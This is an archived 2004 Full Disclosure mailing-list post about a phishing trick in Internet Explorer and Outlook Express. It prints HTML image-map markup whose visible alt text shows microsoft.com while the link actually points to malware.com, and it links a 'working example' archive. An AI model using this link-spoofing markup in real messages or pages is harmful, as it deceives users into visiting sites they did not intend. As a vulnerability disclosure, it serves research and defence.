Full Disclosure mailing list archives
DEEP SEA PHISHING: Internet Explorer / Outlook Express
From: "http-equiv () excite com" <1 () malware com>
Date: Sat, 8 May 2004 21:29:10 -0000
Saturday, May 08, 2004 More silliness : <A HREF=http://www.microsoft.com alt="http://www.microsoft.com"> <IMG SRC="malware.gif" USEMAP="#malware" border=0 alt="http://www.microsoft.com"></A> <map NAME="malware" alt="http://www.microsoft.com">> <area SHAPE=RECT COORDS="224,21" HREF="http://www.malware.com" alt="http://www.microsoft.com"> </MAP> Notes: Outlook 2003 has a bubble that correctly identifies it even with the alternative text Working Example: http://www.malware.com/pheeesh.zip End Call -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- DEEP SEA PHISHING: Internet Explorer / Outlook Express http-equiv () excite com (May 08)